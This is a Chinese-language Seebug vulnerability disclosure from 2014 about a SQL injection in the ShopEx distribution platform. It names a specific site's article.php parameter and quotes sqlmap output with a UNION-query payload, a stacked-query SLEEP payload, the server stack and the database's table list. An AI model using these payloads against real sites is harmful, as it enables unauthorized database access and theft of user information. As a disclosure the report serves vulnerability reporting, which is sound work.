ShopEx分销平台sql注入漏洞导致用户信息泄露

2014-02-06T00:00:00
ID SSV:93428
Type seebug
Reporter Root
Modified 2014-02-06T00:00:00

Description

简要描述:

ShopEx分销平台sql注入

详细说明:

<img src="https://images.seebug.org/upload/201402/05160141e7aced08aa13321f0ab4d9bcd0c707a6.jpg" alt="1.JPG" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201402/051602327235f66a3683cce2b0e1feeb66984a14.jpg" alt="2.JPG" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201402/051604172d58a00196c299ac2e20e2a3d06a75fe.jpg" alt="3.JPG" width="600" onerror="javascript:errimg(this);">

注入点:

``` http://www.fengxiaowang.cn:80/article.php?aa_id=* (GET) sqlmap identified the following injection points with a total of 184 HTTP(s) requests:


Place: URI Parameter: #1* Type: UNION query Title: MySQL UNION query (NULL) - 7 columns Payload: http://www.fengxiaowang.cn:80/article.php?aa_id=' UNION ALL SELECT NULL,CONCAT(0x7177726971,0x536248626f76574b6549,0x7178746671),NULL,NULL,NULL,NULL,NULL# Type: stacked queries Title: MySQL > 5.0.11 stacked queries Payload: http://www.fengxiaowang.cn:80/article.php?aa_id='; SELECT SLEEP(5)--


web application technology: Nginx, PHP 5.2.13 back-end DBMS: MySQL 5.0.11 web application technology: Nginx, PHP 5.2.13 back-end DBMS: MySQL 5.0.11 Database: b2b_fenxiaowang [9 tables] +------------------+ | category | | data | | photo | | photo_extend | | product_active | | products | | products_content | | products_extend | | webnews | +------------------+ ```

漏洞证明:

部分用户信息:

<img src="https://images.seebug.org/upload/201402/05160632dbba200178b61397834192818cf72af1.jpg" alt="4.JPG" width="600" onerror="javascript:errimg(this);">